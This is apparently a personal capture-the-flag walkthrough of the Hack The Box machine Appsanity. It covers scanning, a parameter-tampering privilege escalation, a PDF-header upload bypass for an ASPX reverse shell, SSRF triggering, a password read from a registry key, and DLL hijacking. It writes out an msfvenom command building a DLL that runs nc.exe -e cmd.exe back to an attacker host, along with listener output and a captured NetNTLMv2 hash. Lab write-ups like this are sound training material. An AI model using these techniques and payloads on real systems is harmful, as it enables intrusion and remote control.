NMAP:
# Nmap 7.94 scan initiated Sat Oct 28 15:01:28 2023 as: nmap -sCV -p80,443,7680 -Pn -n -oN allports 10.10.11.238 Nmap scan report for 10.10.11.238 Host is up (0.075s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Did not follow redirect to https://meddigi.htb/ 443/tcp open https? 7680/tcp open pando-pub? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Oct 28 15:02:21 2023 -- 1 IP address (1 host up) scanned in 53.32 seconds
# Nmap 7.94 scan initiated Sat Oct 28 15:01:28 2023 as: nmap -sCV -p80,443,7680 -Pn -n -oN allports 10.10.11.238
Nmap scan report for 10.10.11.238
Host is up (0.075s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://meddigi.htb/
443/tcp open https?
7680/tcp open pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 15:02:21 2023 -- 1 IP address (1 host up) scanned in 53.32 seconds
ONLY PORTS
kali@kali ~/machines/appsanity/nmap $ nmap 10.10.11.238 -p- --min-rate 5000 Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-28 15:03 EDT Nmap scan report for 10.10.11.238 Host is up (0.075s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 443/tcp open https 5985/tcp open wsman
kali@kali ~/machines/appsanity/nmap $ nmap 10.10.11.238 -p- --min-rate 5000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-28 15:03 EDT
Nmap scan report for 10.10.11.238
Host is up (0.075s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5985/tcp open wsmanThe application was running an app wiht out many functionalities. you can just create a user, and send messages to a supervisor, which you did not had assigned, so nobody review them
since there was a box to send data, an it supoosed to be reviewed by somebody, i send a lot of xss payloads, to see if somebody reached my box, but never got a hit.
so instead of focusing more on xss payloads, i try to see if there was another subdomain. and i found the portal.meddigi.htb
kali@kali ~/machines/appsanity/content $ wfuzz -c -u 'https://meddigi.htb/' -H 'Host: FUZZ.meddigi.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150 --hh 315 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: https://meddigi.htb/ Total requests: 114441 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000048: 200 56 L 162 W 2976 Ch "portal"
kali@kali ~/machines/appsanity/content $ wfuzz -c -u 'https://meddigi.htb/' -H 'Host: FUZZ.meddigi.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150 --hh 315
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://meddigi.htb/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000048: 200 56 L 162 W 2976 Ch "portal" so looking at it, i found another web , but i required creds to log in
and i did not had anything to log in
so i tried for sqli , no sqli, adn a bunch of other stuff, but no luck.
so then i looked closely at how i was registering my user, because it was possible, that is was having hidden parameters that i could modify with burpsuite to set my priviledges to a higher level
looking detailed at it, i knew all the fileds at leas for the Acctype, it was setted to 1
so i tried to set it to 0 to see if something changes, and got an error, but if i treid with 2, i did not got the error
and when i log in, i could see the pannel as a doctor
i has the posibility of add patients , but that was not the interesting thing here. the good thin, is taht probably i could reuse the cookie to authenticate as a doctor on the pannel.meddigi.htb, because that pannel just were for doctors
FOOTHOLD
i used the cookie with teh same values and names, and put it on the log in portal of the portal.meddigi.htb, and reload the page, and was able to log in
by looking detailed at each of the functionality of the pannel, i found
that there was probably 2 vulnerabilities that i could try to exploit, 1 was a SSRF on the issue prescription
, since i could put a link. and the other one, was a file upload, and since it was an iis server, i could try wiht asp or aspx shells, and try to see a way to browse my file
PDF UPLOAD BYPASS
the upload reports, just accepted pdf fle types, so i could try to bypass the fiulter by putting the magic bytes of the pdf, and then putting my aspx rev shell, the thing here, is that i did not know where to find the shell, since to trigger the shell i had to browse it.
in that way, i could bypass the simple filter
, i did not even need to change the format of the file, i just needed to change the header
and that was it
like i said before, even if i put a shell on teh box, i ahd to trigger it, and since the page called issue prescription allowed me to do a ssrf and points to local services on the box
first i ran an internal port discovery to see what possibles ports were open internally
the principle was , that when i put a port that was open, i could get the response back, otherwise a redirect
so i capture the request, and did an internal port discovery by just simply filtering the 302 status, since that means that the page did not existed, and when existed it gave me a 200
so with fuzz i fuzzed the ports
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : https://portal.meddigi.htb/Prescriptions/SendEmail
:: Wordlist : FUZZ: /home/kali/machines/appsanity/content/dic
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
:: Header : Accept: */*
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate
:: Header : Sec-Fetch-Site: same-origin
:: Header : Te: trailers
:: Header : Cookie: .AspNetCore.Antiforgery.d2PTPu5_rLA=CfDJ8CmqBmoJQudAuydydRd1KSODVIKyZAN0Ztae8slccg4kqsO-hnQhyZi1S9GwA36D9Ns6HSA3vAKRD46xTaqH7-T2oSIhs-_BFYiS6b0ffESTd2-HPdizIz1_msXHOCBW_O91nALnf_Cr0bTMtJ0Tycs; access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6InRlc3RAdGVzdCIsIm5iZiI6MTY5ODYxMTQyNiwiZXhwIjoxNjk4NjE1MDI2LCJpYXQiOjE2OTg2MTE0MjYsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.5GPmaae3WSE1Q1JJreHoBndi4DYS4mp3k2PcVuz5-CM
:: Header : Referer: https://portal.meddigi.htb/Prescriptions
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Origin: https://portal.meddigi.htb
:: Header : Sec-Fetch-Dest: empty
:: Header : Sec-Fetch-Mode: cors
:: Header : Host: portal.meddigi.htb
:: Data : Email=test%40test.com&Link=http%3A%2F%2F127.0.0.1%3AFUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 302,500
[Status: 200, Size: 2060, Words: 688, Lines: 54, Duration: 1479ms]
* FUZZ: 8080
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : https://portal.meddigi.htb/Prescriptions/SendEmail
:: Wordlist : FUZZ: /home/kali/machines/appsanity/content/dic
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
:: Header : Accept: */*
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate
:: Header : Sec-Fetch-Site: same-origin
:: Header : Te: trailers
:: Header : Cookie: .AspNetCore.Antiforgery.d2PTPu5_rLA=CfDJ8CmqBmoJQudAuydydRd1KSODVIKyZAN0Ztae8slccg4kqsO-hnQhyZi1S9GwA36D9Ns6HSA3vAKRD46xTaqH7-T2oSIhs-_BFYiS6b0ffESTd2-HPdizIz1_msXHOCBW_O91nALnf_Cr0bTMtJ0Tycs; access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6InRlc3RAdGVzdCIsIm5iZiI6MTY5ODYxMTQyNiwiZXhwIjoxNjk4NjE1MDI2LCJpYXQiOjE2OTg2MTE0MjYsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.5GPmaae3WSE1Q1JJreHoBndi4DYS4mp3k2PcVuz5-CM
:: Header : Referer: https://portal.meddigi.htb/Prescriptions
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Origin: https://portal.meddigi.htb
:: Header : Sec-Fetch-Dest: empty
:: Header : Sec-Fetch-Mode: cors
:: Header : Host: portal.meddigi.htb
:: Data : Email=test%40test.com&Link=http%3A%2F%2F127.0.0.1%3AFUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 302,500
[Status: 200, Size: 2060, Words: 688, Lines: 54, Duration: 1479ms]
* FUZZ: 8080
so knowing that , it was possible to be an http-proxy, so i hit it manually, and found this
i could see my report uploaded, and if i scroll to the right, i could see the hyperlink and where it points to
it poitsn to my malicios shell
https://portal.meddigi.htb/ViewReport.aspx?file=e98d768d-efa8-4a37-9399-feda213ef947_shell.aspx
so with the ssrf , i could try to browse that file, adn load it, since when i tried to do it without, it never loads, but if i loads the file from the ssrf , adn the proxy, i get the shell
kali@kali ~/machines/appsanity/content $ nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.15] from (UNKNOWN) [10.10.11.238] 61384 Spawn Shell... Microsoft Windows [Version 10.0.19045.3570] (c) Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami appsanity\svc_exampanel c:\windows\system32\inetsrv>
kali@kali ~/machines/appsanity/content $ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.238] 61384
Spawn Shell...
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
appsanity\svc_exampanel
c:\windows\system32\inetsrv>USER FLAG
Being the user svc_exampanel, i could read the user flag
c:\Users>cd svc_exampanel\desktop cd svc_exampanel\desktop c:\Users\svc_exampanel\Desktop>type user.txt type user.txt f318588a51ca69a4b1926221c65c4d42 c:\Users\svc_exampanel\Desktop>
c:\Users>cd svc_exampanel\desktop
cd svc_exampanel\desktop
c:\Users\svc_exampanel\Desktop>type user.txt
type user.txt
f318588a51ca69a4b1926221c65c4d42
c:\Users\svc_exampanel\Desktop>PIVOT
after enumerating for a while on the box, i probably realized that i needed to pivot to the user devdoc, since it was the only user on remote management group
c:\Users\svc_exampanel\Desktop>net user devdoc net user devdoc User name devdoc Full Name devdoc Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 9/24/2023 10:31:55 AM Password expires Never Password changeable 9/24/2023 10:31:55 AM Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon 10/30/2023 9:50:47 AM Logon hours allowed All Local Group Memberships *Remote Management Use*Users Global Group memberships *None The command completed successfully.
c:\Users\svc_exampanel\Desktop>net user devdoc
net user devdoc
User name devdoc
Full Name devdoc
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/24/2023 10:31:55 AM
Password expires Never
Password changeable 9/24/2023 10:31:55 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/30/2023 9:50:47 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.so looking at possible password or interesting stuff, i found a dll, that i found on the only folder that i had access on teh inetpub
Directory of c:\inetpub\ExaminationPanel\ExaminationPanel\bin 09/26/2023 07:30 AM <DIR> . 09/26/2023 07:30 AM <DIR> .. 09/24/2023 08:46 AM 4,991,352 EntityFramework.dll 09/24/2023 08:46 AM 591,752 EntityFramework.SqlServer.dll 09/24/2023 08:46 AM 13,824 ExaminationManagement.dll 09/24/2023 08:46 AM 40,168 Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll 09/24/2023 08:49 AM <DIR> roslyn 09/24/2023 08:46 AM 431,792 System.Data.SQLite.dll 09/24/2023 08:46 AM 206,512 System.Data.SQLite.EF6.dll 09/24/2023 08:46 AM 206,520 System.Data.SQLite.Linq.dll 09/24/2023 08:49 AM <DIR> x64 09/24/2023 08:49 AM <DIR> x86
Directory of c:\inetpub\ExaminationPanel\ExaminationPanel\bin
09/26/2023 07:30 AM <DIR> .
09/26/2023 07:30 AM <DIR> ..
09/24/2023 08:46 AM 4,991,352 EntityFramework.dll
09/24/2023 08:46 AM 591,752 EntityFramework.SqlServer.dll
09/24/2023 08:46 AM 13,824 ExaminationManagement.dll
09/24/2023 08:46 AM 40,168 Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
09/24/2023 08:49 AM <DIR> roslyn
09/24/2023 08:46 AM 431,792 System.Data.SQLite.dll
09/24/2023 08:46 AM 206,512 System.Data.SQLite.EF6.dll
09/24/2023 08:46 AM 206,520 System.Data.SQLite.Linq.dll
09/24/2023 08:49 AM <DIR> x64
09/24/2023 08:49 AM <DIR> x86all the other files, were common files, the only 1 weird, was the ExaminationManagement.dll, so i transfer it to my windows box, and look at it with dnspy
it has some functions to do all kind of stuff, but the cool thing , is that it was createing some databases, (sqlite), and it was using credentials to do it. howeever the creds were not in plain text, but it was using data from a Registry Key
c:\inetpub\ExaminationPanel\ExaminationPanel\bin>powershell (Get-ItemProperty -Path "HKLM:\Software\MedDigi" -Name "EncKey").EncKey powershell (Get-ItemProperty -Path "HKLM:\Software\MedDigi" -Name "EncKey").EncKey 1g0tTh3R3m3dy!!
c:\inetpub\ExaminationPanel\ExaminationPanel\bin>powershell (Get-ItemProperty -Path "HKLM:\Software\MedDigi" -Name "EncKey").EncKey
powershell (Get-ItemProperty -Path "HKLM:\Software\MedDigi" -Name "EncKey").EncKey
1g0tTh3R3m3dy!!i tried win rm , and it worked
CONNECT AS DEV DOC WITH EVIL-WINRM
kali@kali ~/machines/appsanity/content/dll debug $ evil-winrm -i 10.10.11.238 -u 'devdoc' -p '1g0tTh3R3m3dy!!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\devdoc\Documents> whoami
appsanity\devdockali@kali ~/machines/appsanity/content/dll debug $ evil-winrm -i 10.10.11.238 -u 'devdoc' -p '1g0tTh3R3m3dy!!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\devdoc\Documents> whoami
appsanity\devdoclooking at everythin, i found a big program in programdata, called
-a---- 10/20/2023 2:56 PM 102912 ReportManagement.exe , it was running and it was using the port 100 to interact with it
143 9 1448 6924 5624 0 ReportManagement
143 9 1448 6924 5624 0 ReportManagement
TCP 0.0.0.0:100 0.0.0.0:0 LISTENING 5900
TCP 0.0.0.0:100 0.0.0.0:0 LISTENING 5900
i could try to interact with it, but it would be kind of blind, so what i did , was to transfer it to my box, and analyze it.
i wasted a lot of time here, because i tryied to use some dissasembless , but not many of them worked, since it was a 32 bits program, and a .exe, it was a paing to debug
the easiest one that worked for me at the end of the day, was ghidra, since just by sorting for strings, gave me a better idea of what the program was using and how it works.
it did niot had a specifif main function or stuff like that, that i why i decided to go for the Strings
i got a bunch of stuff, but i could see clearly that it was using the Librarydirectory, in which i was able to write, and in that directory, it was calling a dll called ExtrenalUpload.dll
so the path here was easy, by knowing what dll was using, and knowing how the program works, i could inject my malicious dll on that Folder, and interact with the program in the port 100 and use the option upload, so it would trigger my exploit.
1. Create Mal DLL
kali@kali ~/machines/appsanity/content $ msfvenom -p windows/x64/exec cmd='\\10.10.14.15\smb\nc.exe -e cmd.exe 10.10.14.15 443' -f dll > shell.dll
kali@kali ~/machines/appsanity/content $ msfvenom -p windows/x64/exec cmd='\\10.10.14.15\smb\nc.exe -e cmd.exe 10.10.14.15 443' -f dll > shell.dllthen transfer it an put it on the folder, adn finally interact with the server with the optiob upload
kali@kali ~/machines/appsanity/content/root $ nc 127.0.0.1 100 Reports Management administrative console. Type "help" to view available commands. upload http://10.10.14.15 Attempting to upload to external source.
kali@kali ~/machines/appsanity/content/root $ nc 127.0.0.1 100
Reports Management administrative console. Type "help" to view available commands.
upload http://10.10.14.15
Attempting to upload to external source.Once i did that, i got the call on the smb folder for the nc.exe
[*] Administrator::APPSANITY:aaaaaaaaaaaaaaaa:16abe4fe072e554e3dbac06d88d5935d:010100000000000000e5d376480bda01aecbe2a4617c86d400000000010010004e00490068006e0057007a0069004900030010004e00490068006e0057007a006900490002001000690074006a005500710064007400460004001000690074006a00550071006400740046000700080000e5d376480bda0106000400020000000800300030000000000000000000000000300000f51c188a2f913934cc3ff52d19490a924dd8cbdcd96411842d2b85834fadddc90a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000 [*] Connecting Share(1:smb) [*] Connecting Share(2:IPC$) [-] SMB2_TREE_CONNECT not found SystemResources [-] SMB2_TREE_CONNECT not found SystemResources [*] Disconnecting Share(2:IPC$)
[*] Administrator::APPSANITY:aaaaaaaaaaaaaaaa:16abe4fe072e554e3dbac06d88d5935d:010100000000000000e5d376480bda01aecbe2a4617c86d400000000010010004e00490068006e0057007a0069004900030010004e00490068006e0057007a006900490002001000690074006a005500710064007400460004001000690074006a00550071006400740046000700080000e5d376480bda0106000400020000000800300030000000000000000000000000300000f51c188a2f913934cc3ff52d19490a924dd8cbdcd96411842d2b85834fadddc90a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000
[*] Connecting Share(1:smb)
[*] Connecting Share(2:IPC$)
[-] SMB2_TREE_CONNECT not found SystemResources
[-] SMB2_TREE_CONNECT not found SystemResources
[*] Disconnecting Share(2:IPC$)
and then the shell in my listener
kali@kali ~/machines/appsanity/content/root $ nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.15] from (UNKNOWN) [10.10.11.238] 61362 Microsoft Windows [Version 10.0.19045.3570] (c) Microsoft Corporation. All rights reserved. C:\Program Files\ReportManagement>whoami whoami appsanity\administrator C:\Program Files\ReportManagement>type \users\administrator\desktop\root.txt type \users\administrator\desktop\root.txt 37c12244c4b624be76381579c7ccf924 C:\Program Files\ReportManagement>
kali@kali ~/machines/appsanity/content/root $ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.238] 61362
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\ReportManagement>whoami
whoami
appsanity\administrator
C:\Program Files\ReportManagement>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
37c12244c4b624be76381579c7ccf924
C:\Program Files\ReportManagement>focus on teh function
1400042B0
Probably that function is calling a dll that i can hijack